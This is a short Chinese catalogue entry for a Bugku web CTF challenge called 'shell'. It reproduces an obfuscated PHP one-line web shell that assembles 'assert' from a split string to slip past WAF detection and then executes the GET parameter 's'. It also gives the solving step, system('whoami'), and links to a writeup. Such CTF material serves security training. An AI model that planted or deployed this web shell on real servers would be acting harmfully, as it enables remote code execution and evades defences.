shell
| ID: | 125 |
|---|---|
| 标题: | shell |
| 描述: | 送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) |
| 类型: | WEB |
| 网站: | bugku |
| 题目链接: | https://ctf.bugku.com/challenges/detail/id/89.html |
| 赛事: | bugku |
| 年度: | None |
| Flag值: | system('whoami')通过GET参数执行代码获取flag |
| writeup: | https://blog.csdn.net/weixin_47450099/article/details/139245987 |